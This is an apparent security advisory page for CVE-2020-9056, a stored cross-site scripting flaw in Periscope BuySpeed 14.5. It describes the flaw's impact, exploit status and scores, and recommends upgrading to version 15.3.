14.5.1
CVE-2020-9056 describes a stored cross-site scripting (XSS) vulnerability affecting Periscope BuySpeed version 14.5. A successful exploit could allow an attacker to inject malicious JavaScript code, potentially compromising user sessions and sensitive data. This vulnerability impacts BuySpeed version 14.5 and has been addressed in version 15.3.
The primary impact of CVE-2020-9056 is the potential for an attacker to execute arbitrary JavaScript code within the context of a user's browser session. This could manifest in several ways, including website redirection to phishing sites, the theft of session cookies leading to account takeover, and the exfiltration of sensitive information displayed on the BuySpeed application. Because the vulnerability is stored, an attacker only needs to inject the malicious script once; subsequent users accessing the affected page will be vulnerable. The severity is considered LOW due to the requirement for authenticated access, limiting the potential attack surface.
CVE-2020-9056 was publicly disclosed on April 10, 2020. No public proof-of-concept exploits are currently known. The vulnerability is not listed on the CISA KEV catalog. Given the LOW CVSS score and lack of public exploits, the probability of active exploitation is considered low.
Exploit Status
EPSS
0.30% (54% percentile)
CVSS Vector
The primary mitigation for CVE-2020-9056 is to upgrade BuySpeed to version 15.3 or later, which contains the fix for this vulnerability. If upgrading immediately is not feasible, consider implementing input validation and output encoding on user-supplied data within the BuySpeed application to reduce the risk of XSS attacks. While not a complete solution, a Web Application Firewall (WAF) configured to detect and block XSS payloads can provide an additional layer of defense. After upgrading, confirm the vulnerability is resolved by attempting to inject a simple JavaScript payload into a user-controlled field and verifying that it is not executed.
Update BuySpeed to version 15.3 or higher. This version contains the fix for the stored Cross-Site Scripting (XSS) vulnerability.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2020-9056 is a stored cross-site scripting vulnerability in Periscope BuySpeed version 14.5, allowing attackers to inject JavaScript code.
If you are using Periscope BuySpeed version 14.5, you are potentially affected and should upgrade immediately.
Upgrade to version 15.3 or later to resolve the vulnerability. Consider input validation and WAF rules as interim measures.
Currently, there are no known public exploits or confirmed active exploitation campaigns for CVE-2020-9056.
Refer to the Periscope BuySpeed release notes and security advisories on the Periscope website for details.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.